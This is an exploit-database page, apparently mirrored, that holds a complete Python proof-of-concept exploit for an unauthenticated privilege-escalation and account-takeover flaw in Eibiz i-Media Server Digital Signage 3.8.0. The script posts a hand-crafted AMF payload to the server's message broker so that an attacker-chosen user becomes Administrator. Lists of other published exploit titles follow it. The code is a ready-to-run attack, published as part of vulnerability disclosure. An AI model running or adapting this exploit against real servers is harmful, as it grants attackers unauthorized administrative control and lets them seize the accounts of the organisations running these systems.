To access the dashboard, Schedule scans, API and Search become a patron

Search for hundreds of thousands of exploits

"Eibiz i-Media Server Digital Signage 3.8.0 - Privilege Escalation"

Author

Exploit author

LiquidWorm

Platform

Exploit platform

hardware

Release date

Exploit published date

2020-08-28

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
# Exploit Title: Eibiz i-Media Server Digital Signage 3.8.0 - Privilege Escalation
# Date: 2020-08-28
# Exploit Author: LiquidWorm
# Vendor Homepage: http://www.eibiz.co.th
# Version: 3.8.0
# Tested on: Windows
# CVE : N/A

#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
#
# Eibiz i-Media Server Digital Signage 3.8.0 Remote Privilege Escalation / Account Takeover
#
#
# Vendor: EIBIZ Co.,Ltd.
# Product web page: http://www.eibiz.co.th
# Affected version: <=3.8.0
#
# Summary: EIBIZ develop advertising platform for out of home media in that
# time the world called "Digital Signage". Because most business customers
# still need get outside to get in touch which products and services. Online
# media alone cannot serve them right place, right time.
#
# Desc: The application suffers from an unauthenticated remote privilege escalation
# and account takeover vulnerability that can be triggered by directly calling the
# updateUser object (part of ActionScript object graphs), effectively elevating to
# an administrative role or taking over an existing account by modifying the settings.
#
# Tested on: Windows Server 2016
#            Windows Server 2012 R2
#            Windows Server 2008 R2
#            Apache Flex
#            Apache Tomcat/6.0.14
#            Apache-Coyote/1.1
#            BlazeDS Application
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
#                             @zeroscience
#
#
# Advisory ID: ZSL-2020-5584
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5584.php
#
#
# 26.07.2020
#
#


import requests
import sys#####|
import re##### |
#############  |
############   |
###########    |
##########     |
#########      |
########       |
#######        |
######         |
#####          |
#PoC           |
###            |
##             |
#              |
class Escalada:
    
    def __init__(self):
        self.session = "11111111112222222222333333333344"
        self.agent = "DigitalSigner/25.1"
        self.display = "Intruder Alert"
        self.ep = "/messagebroker/amf"
        self.suprole = "Designer"
        self.serialize = None
        self.address = None
        self.usrname = None
        self.passwrd = None
        self.headers = None

    def usage(self):
    	if len(sys.argv) < 5:
            print("i-Media Server Digital Signage 3.8.0 Privilege Escalation")
            print("Usage: ./poc.py [ip] [username] [password] [displayname] [role]")
            print("Example: ./poc.py 192.168.1.1 testingus 111111 Backdoor Administrator")
            exit(21)
        else:
            self.address = sys.argv[1]
            self.usrname = sys.argv[2]
            self.passwrd = sys.argv[3]
            self.display = sys.argv[4]
            self.suprole = (bytes("Administrator".encode("utf-8")) if len(sys.argv) < 6 else sys.argv[5])
            #__
            #  | Administrator __
            #                    | Designer __
            #                                 | Reporter __
            #                                              | Approver
            if not "http" in self.address:
                self.address = "http://{}".format(self.address)

    def amf(self):
    	self.cookies = {"JSESSIONID"      : self.session} # not really needed
        self.headers = {"User-Agent"      : self.agent,
                        "Accept"          : "*/*",
                        "Accept-Language" : "en-US,en;q=0.5",
                        "Accept-Encoding" : "gzip, deflate",
                        "Origin"          : self.address,
                        "Connection"      : "close",
                        "Referer"         : self.address + "/main.swf",
                        "Content-Type"    : "application/x-amf"}

        self.serialize  = b"\x00\x03\x00\x00\x00\x01\x00\x04\x6E\x75\x6C\x6C"
        self.serialize += b"\x00\x03\x2F\x35\x38\x00\x00\x01\xFE\x0A\x00\x00"
        self.serialize += b"\x00\x01\x11\x0A\x81\x13\x4F\x66\x6C\x65\x78\x2E"
        self.serialize += b"\x6D\x65\x73\x73\x61\x67\x69\x6E\x67\x2E\x6D\x65"
        self.serialize += b"\x73\x73\x61\x67\x65\x73\x2E\x52\x65\x6D\x6F\x74"
        self.serialize += b"\x69\x6E\x67\x4D\x65\x73\x73\x61\x67\x65\x0D\x73"
        self.serialize += b"\x6F\x75\x72\x63\x65\x13\x6F\x70\x65\x72\x61\x74"
        self.serialize += b"\x69\x6F\x6E\x13\x6D\x65\x73\x73\x61\x67\x65\x49"
        self.serialize += b"\x64\x13\x74\x69\x6D\x65\x73\x74\x61\x6D\x70\x09"
        self.serialize += b"\x62\x6F\x64\x79\x11\x63\x6C\x69\x65\x6E\x74\x49"
        self.serialize += b"\x64\x17\x64\x65\x73\x74\x69\x6E\x61\x74\x69\x6F"
        self.serialize += b"\x6E\x15\x74\x69\x6D\x65\x54\x6F\x4C\x69\x76\x65"
        self.serialize += b"\x0F\x68\x65\x61\x64\x65\x72\x73\x01\x06\x15\x75"
        self.serialize += b"\x70\x64\x61\x74\x65\x55\x73\x65\x72\x06\x49\x31"
        self.serialize += b"\x42\x38\x39\x37\x41\x38\x36\x2D\x37\x33\x42\x45"
        self.serialize += b"\x2D\x30\x35\x42\x31\x2D\x43\x45\x42\x33\x2D\x41"
        self.serialize += b"\x30\x35\x35\x30\x39\x36\x34\x31\x31\x34\x34\x04"
        self.serialize += b"\x00\x09\x05\x01\x0A\x81\x73\x1B\x64\x73\x2E\x6D"
        self.serialize += b"\x6F\x64\x65\x6C\x2E\x55\x73\x65\x72\x11\x70\x61"
        self.serialize += b"\x73\x73\x77\x6F\x72\x64\x0D\x63\x72\x65\x61\x74"
        self.serialize += b"\x65\x07\x74\x65\x6C\x07\x66\x61\x78\x09\x6E\x61"
        self.serialize += b"\x6D\x65\x0F\x61\x64\x64\x72\x65\x73\x73\x0D\x75"
        self.serialize += b"\x70\x64\x61\x74\x65\x05\x69\x64\x0D\x6D\x6F\x62"
        self.serialize += b"\x69\x6C\x65\x0F\x75\x44\x65\x6C\x65\x74\x65\x15"
        self.serialize += b"\x64\x65\x70\x61\x72\x74\x6D\x65\x6E\x74\x09\x72"
        self.serialize += b"\x6F\x6C\x65\x09\x72\x65\x61\x64\x0B\x65\x6D\x61"
        self.serialize += b"\x69\x6C\x0F\x63\x6F\x6D\x70\x61\x6E\x79\x06" #-"
        
        self.bytecount  = len(self.passwrd * 2) + 1
        self.bytesdata  = [self.bytecount]
        self.serialize += "".join(map(chr, self.bytesdata))
        
        self.serialize += (bytes(self.passwrd.encode("utf-8"))) #-----------"
        self.serialize += b"\x03\x06\x19\x31\x31\x31\x2D\x32\x32\x32\x2D\x33"
        self.serialize += b"\x33\x33\x33\x06\x19\x33\x33\x33\x2D\x32\x32\x32"
        self.serialize += b"\x2D\x31\x31\x31\x31\x06" #---------------------"
        
        self.bytecount  = len(self.display * 2) + 1
        self.bytesdata  = [self.bytecount]
        self.serialize += "".join(map(chr, self.bytesdata))
        
        self.serialize += (bytes(self.display.encode("utf-8"))) #-----------"
        self.serialize += b"\x06\x1F\x49\x6D\x61\x67\x69\x6E\x61\x72\x79\x53"
        self.serialize += b"\x74\x72\x65\x65\x74\x03\x06" #-----------------"

        self.bytecount  = len(self.usrname * 2) + 1
        self.bytesdata  = [self.bytecount]
        self.serialize += "".join(map(chr, self.bytesdata))
        
        self.serialize += (bytes(self.usrname.encode("utf-8"))) #-----------"
        self.serialize += b"\x06\x01\x03\x06\x11\x53\x65\x63\x75\x72\x69\x74"
        self.serialize += b"\x79\x06" #-------------------------------------"

        self.bytecount  = len(self.suprole * 2) + 1
        self.bytesdata  = [self.bytecount]
        self.serialize += "".join(map(chr, self.bytesdata))
        
        self.serialize += (bytes(self.suprole.encode("utf-8"))) #-----------"
        self.serialize += b"\x03\x06\x15\x7A\x73\x6C\x40\x77\x68\x61\x2E\x62"
        self.serialize += b"\x61\x06\x07\x5A\x53\x4C\x06\x42\x01\x06\x17\x75"
        self.serialize += b"\x73\x65\x72\x53\x65\x72\x76\x69\x63\x65\x04\x00"
        self.serialize += b"\x0A\x0B\x01\x09\x44\x53\x49\x64\x06\x49\x34\x41"
        self.serialize += b"\x35\x46\x33\x33\x43\x33\x2D\x37\x31\x31\x46\x2D"
        self.serialize += b"\x35\x38\x45\x38\x2D\x39\x30\x35\x30\x2D\x39\x35"
        self.serialize += b"\x44\x31\x30\x30\x46\x33\x44\x45\x33\x45\x15\x44"
        self.serialize += b"\x53\x45\x6E\x64\x70\x6F\x69\x6E\x74\x06\x0D\x6D"
        self.serialize += b"\x79\x2D\x61\x6D\x66\x01" #---------------------"

        print("First try...")
        req = requests.post(self.address + self.ep, headers=self.headers, cookies=self.cookies, data=self.serialize)
        #print(req.text.encode("utf-8"))
        if "Detected duplicate HTTP-based FlexSessions" in req.text:
            print("Second try...")
            req = requests.post(self.address + self.ep, headers=self.headers, cookies=self.cookies, data=self.serialize)
            #print(req.text.encode("utf-8"))
            if "AcknowledgeMessage" in req.text:
                print("You are " + self.suprole + " now!")
            else:
                print("Didn't work.")
                exit(0)
        else:
        	print("Try again!")

    def main(self):
        self.usage()
        self.amf()

if __name__ == '__main__':
    Escalada().main()
Release Date Title Type Platform Author
2020-11-20 "Free MP3 CD Ripper 2.8 - Multiple File Buffer Overflow (Metasploit)" local windows ZwX
2020-11-20 "Zortam Mp3 Media Studio 27.60 - Remote Code Execution (SEH)" local windows "Vincent Wolterman"
2020-11-20 "Boxoft Convert Master 1.3.0 - 'wav' SEH Local Exploit" local windows stresser
2020-11-20 "WonderCMS 3.1.3 - 'content' Persistent Cross-Site Scripting" webapps php "Hemant Patidar"
2020-11-20 "IBM Tivoli Storage Manager Command Line Administrative Interface 5.2.0.1 - id' Field Stack Based Buffer Overflow" local windows "Paolo Stagno"
2020-11-19 "Internet Download Manager 6.38.12 - Scheduler Downloads Scheduler Buffer Overflow (PoC)" dos windows "Vincent Wolterman"
2020-11-19 "M/Monit 3.7.4 - Privilege Escalation" webapps multiple "Dolev Farhi"
2020-11-19 "Genexis Platinum 4410 Router 2.1 - UPnP Credential Exposure" remote hardware "Nitesh Surana"
2020-11-19 "PESCMS TEAM 2.3.2 - Multiple Reflected XSS" webapps multiple icekam
2020-11-19 "M/Monit 3.7.4 - Password Disclosure" webapps multiple "Dolev Farhi"
Release Date Title Type Platform Author
2020-11-19 "Fortinet FortiOS 6.0.4 - Unauthenticated SSL VPN User Password Modification" webapps hardware "Ricardo Longatto"
2020-11-19 "Genexis Platinum 4410 Router 2.1 - UPnP Credential Exposure" remote hardware "Nitesh Surana"
2020-11-16 "Cisco 7937G - DoS/Privilege Escalation" remote hardware "Cody Martin"
2020-11-13 "ASUS TM-AC1900 - Arbitrary Command Execution (Metasploit)" webapps hardware b1ack0wl
2020-11-13 "Citrix ADC NetScaler - Local File Inclusion (Metasploit)" webapps hardware "RAMELLA Sebastien"
2020-11-09 "Genexis Platinum-4410 P4410-V2-1.28 - Broken Access Control and CSRF" webapps hardware "Jinson Varghese Behanan"
2020-11-05 "iDS6 DSSPro Digital Signage System 6.2 - Improper Access Control Privilege Escalation" webapps hardware LiquidWorm
2020-11-05 "TP-Link WDR4300 - Remote Code Execution (Authenticated)" remote hardware "Patrik Lantz"
2020-11-05 "iDS6 DSSPro Digital Signage System 6.2 - CAPTCHA Security Bypass" webapps hardware LiquidWorm
2020-11-05 "iDS6 DSSPro Digital Signage System 6.2 - Cross-Site Request Forgery (CSRF)" webapps hardware LiquidWorm
Release Date Title Type Platform Author
2020-11-05 "iDS6 DSSPro Digital Signage System 6.2 - CAPTCHA Security Bypass" webapps hardware LiquidWorm
2020-11-05 "iDS6 DSSPro Digital Signage System 6.2 - Improper Access Control Privilege Escalation" webapps hardware LiquidWorm
2020-11-05 "iDS6 DSSPro Digital Signage System 6.2 - Cross-Site Request Forgery (CSRF)" webapps hardware LiquidWorm
2020-10-27 "Adtec Digital Multiple Products - Default Hardcoded Credentials Remote Root" remote hardware LiquidWorm
2020-10-27 "TDM Digital Signage PC Player 4.1 - Insecure File Permissions" local windows LiquidWorm
2020-10-27 "GoAhead Web Server 5.1.1 - Digest Authentication Capture Replay Nonce Reuse" remote hardware LiquidWorm
2020-10-26 "ReQuest Serious Play F3 Media Server 7.0.3 - Remote Denial of Service" webapps hardware LiquidWorm
2020-10-26 "ReQuest Serious Play F3 Media Server 7.0.3 - Remote Code Execution (Unauthenticated)" webapps hardware LiquidWorm
2020-10-26 "ReQuest Serious Play Media Player 3.0 - Directory Traversal File Disclosure" webapps hardware LiquidWorm
2020-10-26 "ReQuest Serious Play F3 Media Server 7.0.3 - Debug Log Disclosure" webapps hardware LiquidWorm
2020-10-07 "BACnet Test Server 1.01 - Remote Denial of Service (PoC)" dos windows LiquidWorm
2020-10-01 "SpinetiX Fusion Digital Signage 3.4.8 - Username Enumeration" webapps hardware LiquidWorm
2020-10-01 "SpinetiX Fusion Digital Signage 3.4.8 - Database Backup Disclosure" webapps hardware LiquidWorm
2020-10-01 "BrightSign Digital Signage Diagnostic Web Server 8.2.26 - Server-Side Request Forgery (Unauthenticated)" webapps hardware LiquidWorm
2020-10-01 "Sony IPELA Network Camera 1.82.01 - 'ftpclient.cgi' Remote Stack Buffer Overflow" remote hardware LiquidWorm
2020-10-01 "SpinetiX Fusion Digital Signage 3.4.8 - Cross-Site Request Forgery (Add Admin)" webapps hardware LiquidWorm
2020-10-01 "BrightSign Digital Signage Diagnostic Web Server 8.2.26 - File Delete Path Traversal" webapps hardware LiquidWorm
2020-09-25 "B-swiss 3 Digital Signage System 3.6.5 - Cross-Site Request Forgery (Add Maintenance Admin)" webapps multiple LiquidWorm
2020-09-25 "B-swiss 3 Digital Signage System 3.6.5 - Database Disclosure" webapps multiple LiquidWorm
2020-09-21 "B-swiss 3 Digital Signage System 3.6.5 - Remote Code Execution" webapps multiple LiquidWorm
2020-09-14 "Rapid7 Nexpose Installer 6.6.39 - 'nexposeengine' Unquoted Service Path" local windows LiquidWorm
2020-08-28 "Eibiz i-Media Server Digital Signage 3.8.0 - Privilege Escalation" webapps hardware LiquidWorm
2020-08-26 "Eibiz i-Media Server Digital Signage 3.8.0 - Directory Traversal" webapps multiple LiquidWorm
2020-08-24 "Eibiz i-Media Server Digital Signage 3.8.0 - Authentication Bypass" webapps hardware LiquidWorm
2020-08-24 "Eibiz i-Media Server Digital Signage 3.8.0 - Configuration Disclosure" webapps hardware LiquidWorm
2020-08-17 "QiHang Media Web Digital Signage 3.0.9 - Remote Code Execution (Unauthenticated)" webapps hardware LiquidWorm
2020-08-17 "QiHang Media Web Digital Signage 3.0.9 - Cleartext Credential Disclosure" webapps hardware LiquidWorm
2020-08-17 "QiHang Media Web Digital Signage 3.0.9 - Unauthenticated Arbitrary File Deletion" webapps hardware LiquidWorm
2020-08-17 "QiHang Media Web Digital Signage 3.0.9 - Unauthenticated Arbitrary File Disclosure" webapps hardware LiquidWorm
2020-08-07 "All-Dynamics Digital Signage System 2.0.2 - Cross-Site Request Forgery (Add Admin)" webapps hardware LiquidWorm
import requests
response = requests.get('https://www.nmmapper.com/api/v1/exploitdetails/48774/?format=json')

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.